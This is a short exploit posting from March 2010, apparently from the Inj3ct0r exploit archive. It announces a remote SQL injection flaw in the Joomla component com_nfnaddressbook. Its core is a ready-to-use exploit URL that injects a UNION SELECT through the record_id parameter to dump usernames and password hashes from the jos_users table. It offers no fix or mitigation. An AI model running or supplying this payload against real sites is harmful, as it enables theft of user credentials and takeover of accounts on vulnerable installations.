Joomla com_nfnaddressbook Remote Sql Injection Vulnerability
Posted on 14 March 2010
============================================================ Joomla com_nfnaddressbook Remote Sql Injection Vulnerability ============================================================ ============================================================================== [»] Joomla com_nfnaddressbook Remote Sql Injection Vulnerability ============================================================================== [»] Script: [Joomla] [»] Language: [ PHP ] [»] Founder: [ Snakespc ] ########################################################################### ===[ Exploit ]=== [»] http://localhost/joomla/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users-- [»]Author: DrEadFul<- ########################################################################### # ~ - [ [ : Inj3ct0r : ] ]
